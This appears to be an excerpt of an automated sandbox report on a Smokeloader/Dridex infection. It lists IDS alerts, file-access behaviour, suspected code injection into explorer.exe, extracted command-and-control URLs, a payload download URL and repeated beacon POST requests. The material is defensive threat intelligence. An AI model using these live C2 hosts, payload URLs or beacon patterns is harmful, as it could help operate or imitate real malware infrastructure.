    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61443 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61444 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61445 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61446 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61447 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61448 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61449 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61450 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61451 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61452 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61454 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61463 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61465 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61467 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61470 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCAFB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,11_2_00007FF7CBCAFB38
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00432B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_00432B15
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00431D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_00431D4A
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00433ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_00433ED9
    Source: C:\Windows\explorer.exeCode function: 15_2_00E330A8 FindFirstFileW,FindNextFileW,FindClose,15_2_00E330A8
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49836 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49842 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61315 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61297 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61260 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61302 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49843 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61321 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61308 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61270 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61340 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61360 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61365 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61388 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61327 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61355 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61382 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61428 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61430 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61334 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61426 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61427 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61375 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61397 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61404 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61429 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61425 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61424 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61279 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61455 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61461 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61370 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61462 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61459 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61466 -> 190.249.249.14:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61457 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61347 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61419 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61458 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61464 -> 190.249.249.14:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61456 -> 160.177.223.165:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61469 -> 190.249.249.14:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61433 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61433 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61435 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61436 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61438 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61436 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61441 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61435 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61438 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61437 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61441 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61444 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61443 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61444 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61437 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61451 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61443 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61439 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61463 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61451 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61465 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61439 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61463 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61442 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61465 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61447 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61450 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61454 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61442 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61454 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61470 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61467 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61470 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61467 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61447 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61450 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61440 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61434 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61440 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61445 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61434 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61446 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61448 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61446 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61448 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61445 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61452 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61452 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61449 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61449 -> 23.145.40.168:443
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exeNetwork Connect: 190.249.249.14 80Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.168 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 160.177.223.165 80Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: https://ninjahallnews.com/search.php
    Source: Malware configuration extractorURLs: https://fallhandbat.com/search.php
    Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
    Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
    Source: Joe Sandbox ViewASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
    Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
    Source: Joe Sandbox ViewASN Name: MT-MPLSMA MT-MPLSMA
    Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.168:443 -> 192.168.2.6:61433
    Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vucrathrxdck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://krpqgyauqofjy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mjqditygumcpl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xmqdemcyeborscy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ivdqbkwbkfcqmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kygmejbuqfed.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://oearusgjpsibxo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://bkkawsblriievtha.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://cdxudjgvudlubb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mdlgxwobmimrfsiq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kdihkbbguxoo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kwisrrqgrmlvi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ntbrsmlnvptwiq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://iymhwcsxyfccua.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://pyvpiskjnabcb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ndvftlyrsws.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vsqfnosbtpkyeiw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://viuhsicxwcdmbdc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://phumebsddarvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://oqtouvjrjhoopu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ninjahallnews.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vufdhvyhyvwjjkm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://cnafyhqaamox.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vevyfytohbagkutf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://slehgyiiuvhyal.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajlkwtshfrbwcj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmqmhcivixmahfcs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eqlgmwxqcstymthl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uajyyjejyvvbvl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: nwgrus.ru
